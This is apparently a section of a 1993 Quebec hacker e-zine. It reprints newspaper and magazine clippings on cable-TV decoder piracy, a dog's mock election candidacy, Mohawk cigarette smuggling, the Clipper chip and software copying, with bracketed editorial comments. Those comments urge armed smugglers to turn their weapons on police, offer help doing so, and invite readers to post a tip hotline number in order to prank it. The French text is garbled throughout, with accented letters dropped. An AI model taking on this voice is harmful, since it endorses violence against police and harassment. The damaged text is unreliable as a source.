d'autres facteurs conomiques. Plus a a t, plus je m'suis fait
chum avec des architectes, des psychologues, etc..." (...)
"Ca me fait drle de me voir considr comme un
contestataire de sciences politiques: je n'ai pas du tout t
form comme a. Je ne suis mme pas capable de me dfinir comme
de gauche ou de droite. Je suis un prof de comptabilit qui fait
son travail du mieux qu'il peut. Il y en a souvent qui me
traitent de marxiste, je n'sais mme pas c'que c'est!"
- 30 -
Leeeched from THE GLOBE AND MAIL - mardi 25 septembre 1993
CABLE-TV SEEKS TIPS ON DECODERS
Ottawa (CP) - Canada's cable-TV companies want you to rat on your
neighbor.
As part of a crackdown on illegal-TV decoders launched this
week, cable subscribers across the country are being asked to
phone in anonymous tips on a 1-800 pay-TV abuse hotline. The
information will be used to lay criminal charges against the
owners of illegal pay-TV decoders, said carol Ring, a division
manager at Rogers Ottawa, a unit of Rogers Communications Inc. of
Toronto.
The possession of illegal pay-TV decoders, which allow
basic-cable subscribers to receive pay-TV signals such as The
Movie Network without paying for them, is a criminal offense
carrying a fine of up to $5,000, Ms. Ring said. There are an
estimated 65,000 illegal decoders in use in Canada, said Paul
Nielsen, director of marketing for Rogers. The cable industry
figures it would receive about $25-million in additional revenue
if the owners of illegal decoders became paying customers.
- 30 -
[Blitz- Wait a minute, wait a minute! N'est-ce pas le mme Paul
Nielsen, de la mme foutue compagnie, qui dclarait, dans un
article rcent (voir un NPC antrieur), que les compagnies
venaient de mettre au point un systme INCONTOURNABLE qui allait
rendre les dcodeurs pirates caduques d'ici janvier 94? C'tait
quoi d'abord cet article? De la dsinformation? Figures! Anyway,
si quelqu'un possde le fameux numro 1-800 dont parle l'article,
postez-le nous, on va bien s'amuser!]
Leeched from LE DEVOIR - Jeudi 30 septembre 1993
TIA, BOXER AU PEDIGREE IRRPROCHABLE
par Serge Truffaut
Tia, boxer au pedigree politique qualifi "d'irrprochable"
par son organisateur lectoral, bat actuellement la semelle sur
les trottoirs d'Outremont afin d'obtenir les 500 signatures qui
lui permettraient, en tant que reprsentante du Parti politichien
(le PCC), de croiser le fer avec les candidats des autres partis
le 25 octobre prochain.
Hier soir, M. Andr Roussil, qui se dit directeur de
campagne et chef de cabinet de Tia, a assur au moment d'aller
sous presse que 150 lecteurs outremontais et outremontaises
avaient dcid d'appuyer la candidature de ce boxer qui vient
tout juste de faire son entre dans l'arne politique.
Ce succs, obtenu dans un laps de temps relativement bref,
symbolise, selon les confidences de M. Roussil, que "Tia est une
politichienne dans l'me. Elle a normment de flair. C'est une
bte politique qui annonce
mon avis l'apparition d'une nouvelle
espce de politiciens."
Actuellement, l'organisation mise sur pied par Tia compte,
outre M. Roussil, sur une quipe compose de quatre bipdes qui
se dmnent avec d'autant plus d'enthousiasme que Tia est une
politichienne qui sait, avec beaucoup de naturel et de grce, et
contrairement aux autres politiciens, se mettre
quatre pattes.
Telle est du moins l'opinion mise par M. Roussil qui, en
plus d'tre directeur de campagne et organisateur, agit en tant
que porte-parole de Tia. Ayant le manquement
la franchise en
horreur, cette candidate se refuse
faire tout commentaire. Et
ceux qui mettraient cette attitude sur le compte de dficiences
linguistiques, M. Roussil rtorque qu'ils ou elles "ne sont que
des mauvaises langues".
A dfaut donc de causer les yeux dans les yeux avec Tia, M.
Roussil a indiqu que le coeur du programme politique de Tia
tait le suivant: "Face au Fond montaire international, l'ONU,
le G-7 et autres puissants de ce monde, Tia ne sera pas plus
capable de changer quoi que ce soit que Kim Campbell, Jean
Chrtien ou Lucien Bouchard." (...)
Alors pourquoi, direz-vous, voter Tia? Aprs avoir effectu
une analyse de la personnalit propre
chacun des candidats,
analyse dont le srieux mthodologique est d'autant plus vident
qu'on a pas eu recours aux variables astrologiques, tarot et
autres artifices utiliss par les machines lectorales
traditionnelles, il a t constat que Tia tait loyale. Et les
autres? Non.
Qui plus est, Tia affectionnant un rgime alimentaire
logeant
la cuisine de l'efficacit, "elle ne cote pas cher".
Contrairement "
nos adversaires, je vous affirme que le budget
de dpenses de Tia sera mince". En plus d'tre ceci et cela, Tia
est bien dresse, elle est "allchante" et courageuse.
En dernire heure, on a appris que Elizabeth, une bouledogue
arborant les couleurs du Parti indpendant, va tenter galement
d'obtenir 500 signatures. Comme quoi, de conclure M. Roussil qui
est linguistiquement correct: "It's gonna be a two dog race".
- 30 -
[Blitz - Il faut croire que, comme nous appelait Mphisto le
fendant, ce n'est pas si pire d'tre des NPChiens, puisque
maintenant, nos politiciens les plus honntes sont des
politichiens. Ceci dit, Tia n'aura pas la vie facile en campagne,
si quelqu'un s'avise de tout dballer sur sa vie sexuelle. Une
candidate qui se fait sauter en pleine rue par tous les batards
que'elle rencontre...]
Leeched from LE SOLEIL - Vendredi 1er octobre 1993
CONTREBANDE QUI MENACE LES INSTITUTIONS
par Michel Audet
Les Canadiens qui en doutaient encore ont pu, lors d'un
reportage prsent au Point de Radio-Canada, se rendre compte de
l'ampleur du rseau de contrebande cr par les Mohawks
partir
de la rserve d'Akwesasne. Au terme de ce reportage, nombre de
tlspectateurs se sont certainement demands "jusqu'
quand de
tels provocateurs abuseront de notre patience", pour paraphraser
Cicron.
[ THX 1138- C'est drle, je me demande a
tous les jours, quand
je pense
Bell et aux politiciens! ]
Le public sait, depuis longtemps, que cette rserve
constitue la plaque tournante d'un vaste rseau de distribution
illgale de cigarettes. Ces activits clandestines, sur le Saint-
Laurent, sont bien connues des riverains et ne semblaient
chapper qu'aux corps policiers.
[ Comment est-ce que le public sait a? Il est all voir? Vous ne
voulez tout de mme pas dire qu'ils croient tout ce que les
journalistes racontent? ]
Cette tolrance est dicte par les politiciens qui craignent
un affrontement qui ternirait l'image internationale du Canada.
Une attitude perue, par les contrebandiers, comme une victoire
sur l'autorit constitue. (...)
[ Dans mon livre
moi, une "victoire sur l'autorit constitue"
de l'un, c'est une victoire pour tous. Se faire CRAINDRE, c'est
la seule manire d'avoir du respect en ce pays. ]
En plus de faire perdre
l'tat jusqu'
2 milliards $ par
anne [ Pardon! Ils empchent l'tat de nous VOLER 2 milliards
par anne en taxes injustes ] (...), ce march noir fait partie
de nos moeurs et banalise la fraude fiscale [ Pardon encore une
fois! Les gens se sont rendus compte, grce aux indiens, qu'ils
n'avaient pas besoin d'avoir peur. Ils font peut-tre de la
fraude fiscale maintenant (mais c'est un peu gros comme
raisonnement, je trouve. Pas mal gros...), mais ils ne font
ainsi, si c'est vrai, qu'imiter les grosses compagnies protges
jusqu'ici par le pouvoir. ] L'espce de contrat social en vertu
duquel le citoyen jugeait normal que l'tat collecte sa quote-
part dans toute transaction, a t rompu. [ Lire: le joug des
gouvernements tire
sa fin. ] Maintenant, ceux qui la versent
crient
l'injustice. [ Il commence
tre temps! Parce
qu'injustice il y a, n'en doutons pas une seule seconde. ]
Des Mohawks proclament ouvertement qu'ils possdent, grce
la contrebande, une artillerie de meilleure qualit que la GRC. [
Nom de Dieu! Utilisez-l
! Voulez-vous un coup de main? ] (...)
Il ne faut certainement pas tomber dans le panneau d'une
intervention arme improvise comme celle d'Oka, en 1990. On
risquerait ainsi de faire des martyrs que les agitateurs
autochtones utiliseraient encore pour rallier ceux qui s'opposent
au banditisme organis. [ C'est le genre de situation dans
laquelle j'aime bien que la police se trouve: damned if they do,
damned if they don't. Et puis, improvise ou pas, les flics
mangeraient tout de mme une crisse de vole. En effet, ds qu'il
s'agit de se colleter quelqu'un qui a plus de moyens qu'un hacker
de 16 ans, ou qu'un raver qui danse, ou qu'un tudiant de
secondaire qui fume un joint, les flics sont tout
fait
dpasss. C'est pour a que leurs victimes prfres sont les
mineurs sans dfense... ] (...)
- 30 -
Leeched from DR. DOBB'S JOURNAL - Juillet 1993
CLIPPING THE WINGS OF PRIVACY
par Jonathan Erickson
On occasion, even the most hardened criminals commit acts of
mercy. You've seen it in the movies: tough guys like Aldo Rey
snatching a terrified child from the path of a runaway bus or
Humphrey Bogart sacrificing his freedom to save the life of a
nun.
The '90s twist on this story line brings a new kind of
high-tech antihero. Of course, if everyone considered Kevin
Poulsen a hero, he wouldn't be passing time at the Federal
Correctional Institution in Dublin, California. Still, you could
argue that some of the crimes he's accused of do have a socially
beneficial side to them.
In the late '80s, Poulsen, a legendary California cracker
and former SRI employee, supposedly hacked his way into Pentagon,
California Department of Motor Vehicles (DMV), and Pacific Bell
computers where, it's claimed, he surreptitiously gathered
information about FBI wiretap/sting operations and IRS criminal
investigations. In the process, Poulsen also collected a bushel
basket full of indictments ranging from telecommunications and
computer-related fraud to espionage.
While Dublin is a pastoral setting that lends itself to
retrospection, Poulsen didn't relish the prospect of several
years in the slammer. Instead of going to trial, he opted for
life on the owl-hoot trail.
Nearly two years later, Poulsen was picked up, leading the
feds to wonder how he supported himself while underground.
Authorities now claim that Poulsen seized control of incoming
telephone lines of Southern California radio stations sponsoring
call-in contests, allowing him to rig the games by blocking all
incoming calls but his own. (So much for "It's not whether you
win or lose, but how you play the game....") As a "random"
winner, he supposedly absconded with a Hawaiian vacation, a
couple of Porsches, and thousands of dollars in cash. To claim
and unload the prizes, Poulsen allegedly created aliases and
phony IDs, leading to additional charges for computer fraud,
money laundering, and interception of wire or electronic
communications.
There's little question in my mind that pulling the plug on
most radio call-in programsÄÄif only temporarily and with
admittedly questionable motivesÄÄserves the public good. If you
don't think so, just listen to a few of them while stuck in
traffic. Instead of being put in the pokey, Poulsen probably
ought to be sentenced to FCC-sponsored community service. After
summarily dealing with radio call-in programs, maybe he could
turn his attention to TV talk shows.
This isn't to say such crimes aren't seriousÄÄthey are. I'd
be unhappy if someone grabbedÄÄand nefariously usedÄÄconfidential
information about me that's stored on a DMV or Pac Bell computer.
But you also have to wonder whether or not "Clipper," the
government's most recent attempt to grapple with computer
security, is as insidious in its own way as anything Poulsen's
charged with.
The Feds seem most concerned about citizens keeping secrets
from the governmentÄÄexercising our right to have private
conversations with each other. In particular, the FBI is worried
that criminals will begin using encryption to scramble their
communications, thereby twarting wiretaps.
The government's solution is Clipper, the first in a family
of NSA-designed VLSI chips with the classified Skipjack
encryption algorithm hardwired into them. (Skipjack is supposedly
16 million times more secure than DES, the current standard.) To
the Feds' way of thinking, every communication deviceÄÄphone,
modem, and the likeÄÄwould have a Skipjack-based chip designed
into the circuit. All communication between, say, two modems,
each with built-in Clipper chips, would then adhere to Skipjack
protocol.
Individual chips would have a pair of unique numeric keys
which would be handed over to the government by the vendor. To
eavesdrop, law enforcement would get a warrant to tap the phone,
record the communication (which automatically includes the
individual chip identifier), retrieve the key from the government
database, and decrypt the message.
The government sees itself as the SOLE shepherd of Skipjack
and chip keys. Of course, for this scheme to work,
Skipjack/Clipper would have to be the only encryption game in
townÄÄand you can bet there have been discussions about outlawing
encryption techniques other than Skipjack. But millions of
dollars have already been invested in existing schemes (such as
RSA) by Microsoft, Lotus, Novell, Apple, and their millions of
users; mandating change would meet stiff resistance.
And considering the global nature of businesses such as
banking and finance, where encryption is critical, it's unlikely
that other countries (which have generally adopted ISO 9796
encryption) would allow Skipjack/Clipper to be imported. Or
putting the sneaker in the other foot, would the U.S. even now
adopt a Russian encryption scheme over which we had no control?
Nor is there a free lunch involved. Programmed Clipper chips
cost about $25.00 each, which means the price of modems, phones,
and the like will increase accordingly.
Money and export concerns aside, the real issues remain
those of privacy and the government's attitude toward its
citizens. What we're witnessing is a fundamental shift from what
we've considered to be our Constitutional right to privacy to a
view that the government is privy to our most private
conversations. This alone is enough to make Kevin Poulsen look
like nothing more than an angel with a dirty face.
- 30 -
Leeched from PC/COMPUTING - Octobre 1993
SUBTERRANEAN CLIPPER CHIP BLUES
"Phone's tapped anyway."
So do it for Dylan and for Jefferson (Airplane, Starship, and
Thomas).
par Penn Jillette
I've never had a sip of alcohol, nor any recreational drugs
(not one puff to uninhale), but, being 38 years old, I feel I was
part of the hippie culture. I was young and rural in the sixties,
but my formative years were spent listening to music created by
people who chased the muse down many chemical alleys.
Top 40 radio blared that the government wasn't to be
trusted. Dylan sang "Phone's tapped anyway," and his inflection
said that was a bad thing. But even as I was sucking up the
culture, my skeptical side said that all the "Tin soldiers and
Nixon's coming..." stuff might be a little dramatic.
Romanticizing living outside the law, coupled with the
physiological effect of drugs, might be making these artists a
little paranoid, a little nutty.
The joke was kinda on me. Paranoid or not, John Lennon WAS
on Nixon and FBI hate lists, the Vietnam War probably WAS a very
bad idea, and the Watergate break-in and subsequent cover-up
really DID happen. No government is to be trusted. I could have
gotten a stronger lesson from the founding fathers, but they
didn't have any records out. "You say you want a revolution?"...
"The government that governs least governs best."
Clinton is younger than any Rolling Stone (unless they
replace Bill Wyman with a new bass player from his ex-wife's
generation). It would seem that Bill JEFFERSON Clinton would
share the mistrust of Big Brother that we tapped our collective
foot to. But remember, he's not Bob Dylan and Neil YoungÄÄhe's
Kenny G and Fleetwood Mac. Watch him.
Willy picked up Bush's evil encryption Clipper Chip fascist
football and ran with it ("Meet the new bossÄÄsame as the old
boss"). The Clipper Chip is supposed to give us more privacy,
which we need. An ex-friend of mine taped Madonna talking to her
business manager on her cordless phone, and some punk ("punk" in
the prison sense) broke into my Internet account and read my
mail.
The Clipper Chip, which was designed by government
engineers, would be used to scramble and decode information so
that only theaddressee could read it. The government would sell
this chip below market value (some people believe they'd be
getting something for nothing; some people believe Elvis put
syringes in Pepsi), and we'd all have cheap privacy. Oh, by the
way ("The large print giveth, the small print taketh away"), the
government would keep all the keys so they could eavesdrop on
might-be-bad-guys (with a subpoena, of course).
WHAT?!
The anti-Clipper Chip people sent me megs and megs of
reasons why the Clipper Chip sucks (the information on how it
works is kept secret, so private scientists wouldn't be able to
check for mistakes; trade with other countries would be
difficult; how safe could the codes be kept?; and so on). Big
cheese computer people yapped against it, and it got shot down
the first time around on the legislation front.
On the tech front, there is a great cypherpunk ("punk" in
the rock and roll sense) alternative called Pretty Good Privacy,
which is nongovernment and free. One of my math-hip friends
explained public-key encryption to me, and it's pretty good
thinking; I'll try to explain it in a future column. There was
even talk of making private encryption illegal (an evil idea,
pure and simple).
The more research I did, the simpler it got. You have
inalienable rights including life, liberty, and the pursuit of
happiness. That's it. We have a right to communicate with anyone
we choose without anyone listening in. The government works for
us. Power to the people.
- 30 -
Leeched from PC/COMPUTING - Fvrier 1993
IT'S NOT REALLY STEALING, BECAUSE IT'S ME
Look into your conscience and then tell me you wouldn't do it.
par Penn Jillette
What if you could kill someone? You could kill anyone you
wanted and it wouldn't be icky. (They'd just be deadÄÄno
bleeding, screaming, begging, or tearing at your clothes. You
could watch if you wanted to, but you wouldn't have to.) You
could snuff him or her (oh sure, when he's talking about murder,
he's careful about non-gender-specific language) with no chance
of getting caught. Not one chance in hell that anyone would ever
know. Would you do it?
No. Of course not. No way. Get out of Dodge. Uh-uh! What
about knocking off Charlie Manson? No. (With a swastika whittled
into his forehead, he won't ever get paroled.) Ted Bundy? No.
(It's too late, we already did him.) Robert Palmer? No. (It's
kind of too late, and he sometimes shows attractive people in his
videos.) Saddam Hussein? Well... if I really couldn't get
caught... What am I saying? No. It's just not right. No. It's not
fear of punishment that keeps you from taking a stroll down
anarchy lane.
But that one's too easy. What if you could take all the
money from any individual's bank account? Same rules as the
hypothetical no-fault murderÄÄyou can't get caught. But whose
bank account? Trump's? (Would you then be forced to make payments
to Ivana and invest in Marla's "Will Roger's Follies"?) H. Ross
Perot's? (The presidential hobby didn't make a dent, and he has
other bank accounts. He wouldn't starve.) No, I don't think you'd
do that. It just doesn't feel right.
What if you could steal $1 from every man, woman, and child
in the U.S.? Most of them wouldn't even notice, but some would.
No, it's not worth it, you don't really need $242 million.
How 'bout $1 from everyone who buys a copy of PC/COMPUTING.
(Yeah, I know the joke, most months we steal $2.95 from every one
of them.) Would they really miss it? Anyone who can't afford a
chili dog is not buying a glossy collection of ads with sepia
pictures of [John] Dvorak. That's more than a cool million,
cashÄÄ and rememberÄÄyou can't be caught. Would you do that? It's
wrong, that money doesn't belong to you, but it starts feeling
kind of OK, doesn't it?
That's the problem with copying software. Dvorak wrote that
it's just taking money from Bill Gates, and Bill has too much
money anyway. But who decides how much money is too much?
Somalians might well think Dvorak has a bit "too much money."
John's just wrong: Pirates don't steal from big companies, they
steal from the people who pay for software. That's the real
trickle-down.
The New York Times says the software industry loses $2.4
billion through bootlegging. Now some of those stolen programs
just wouldn't be bought at retail price, and some of that money
might end up in Gate's pocket. Some would go into R&D (which
means faster, harder, meaner, tighter, groovier toys). And some
would lower retail prices.
If you steal software, you can't be caught. Some techies may
find a way to make copying impossible, but they'd better hurry.
As more stuff gets digitalÄÄlike musicÄÄmore can be duplicated
perfectly, and that's less money for Warner Brothers (who really
cares?), but also less for Lou Reed and George Romero (and that's
bad). It also means higher prices each time you want to buy some
"intellectual property" the straight and narrow way.
It's a tough moral question for you, but not for me. I get
all my software absolutely free, directly from the manufacturer,
because I write this column.
Maybe if you could kill me without getting caught...
- 30 -
Leeched from LA PRESSE - Samedi 11 septembre 1993
LA CHARTE GARANTIT LE DROIT DE VOTER AUX
LECTIONS, MAIS NON AUX RFRENDUMS
par Marcel Adam
Dans un tribunal d'appel aussi bien que dans le processus
politique, la rgle de la majorit est une technique permettant
de briser pacifiquement une impasse ou de dterminer un gagnant,
non un moyen infaillible de dterminer qui est dans son droit ou
qui possde la plus grande comptence.
Ainsi, dans le cas de la Cour suprme, il est possible que
la plupart du temps la majorit des juges aient raison de la
minorit par la force et la sagesse de l'argumentation, mais ce
n'est pas garanti. Car il arrive que les raisons qui fondent la
dissidence des juges minoritaires soient plus convaincantes.
Ce qui m'amne
parler du jugement que la Cour suprme a
rendu la semaine dernire, dans une cause qui concerne au premier
chef des milliers de nouveaux rsidents qubcois qui n'eurent
pas droit de voter au rfrendum d'octobre dernier.
Dans une dcision
sept contre deux, la Cour suprme a jug
qu'aux termes de la Charte des droits et liberts, les droits de
Graham Haig n'avaient pas t viols quand il fut empch de
voter au Qubec lors de ce rfrendum.
Dans notre province, le rfrendum avait t organis en
vertu d'une loi provinciale qui stipule que pour y voter il faut
avoir rsid dans les six mois prcdant sa tenue. Ce qui n'tait
pas le cas de ce citoyen qui avait dmnag d'Ottawa
Hull au
mois d'aot. M. Haig n'a donc pu voter ni au Qubec
cause de
cela, ni ailleurs au Canada parce qu'il n'y avait pas sa
"rsidence ordinaire".
Le juge Clair L'Heureux-Dub a motiv le jugement
majoritaire en arguant qu'il y a eu le mme jour deux RFRENDUMS
diffrents et non un seul rfrendum "national", comme a fait
l'erreur de le penser le requrant. C'est-
-dire deux
consultations diffrentes portant sur la mme matire mais
organises en vertu de lgislations distinctes.
Cela dit, elle prcise que la garantie de la charte concerne
le droit de voter aux lections, mais non celui de voter
un
rfrendum.
Dans un jugement dissident appuy par le juge en chef
Antonio Lamer, le juge Frank Iacobucci a dit que se concentrer
sur les technicalits des RFRENDUMS spars a pour effet de
masquer "le caractre national du rfrendum".
Aprs avoir rappel la promesse de Brian Mulroney faite
tous les Canadiens en ge de voter qu'ils pourraient se prononcer
sur l'entente de Charlottetown, le magistrat constate que M. Haig
et beaucoup d'autres citoyens sont "tombs entre les craques
lgislatives". Et ont donc t privs de leur droit
constitutionnel de s'exprimer sur une matire d'importance
nationale.
Dans cette cause je me trouve plus facilement en accord avec
la minorit qu'avec la majorit.
En dmocratie, le droit de vote est sacr et il n'y a pas de
pire injustice que de priver un honnte citoyen de son droit de
l'exercer. Aucune argutie juridique ou technique, nulle
considration politique ne peut justifier cette iniquit.
De plus, soutenir que la charte garantit le droit de voter
aux lections mais non celui de voter
un rfrendum me parat
minemment spcieux. Aussi bien dire que la loi fondamentale est
bte. Car si les lections accordent
un parti le mandat
d'administrer dans la continuit constitutionnelle pendant un
terme limit, les RFRENDUMS soumettent au peuple des questions
d'importance vitale pour l'avenir du pays ou d'une province.
Il n'chappera pas aux observateurs, qui ont remarqu un
changement d'attitude de la Cour suprme depuis cinq ou six ans,
que ce jugement tend
confirmer la propension qu'ils lui prtent
de donner raison au gouvernement contre les citoyens se prvalant
de la Charte.
Un changement de cap qui tonne dans la mesure o la Charte
existe pour protger le citoyen contre le gouvernement et non
l'inverse. Et qui s'explique sans doute par le renouvellement
considrable d'une bonne partie de ses effectifs, durant cette
priode, et le choix des candidats fait par le gouvernement
Mulroney. (...)
- 30 -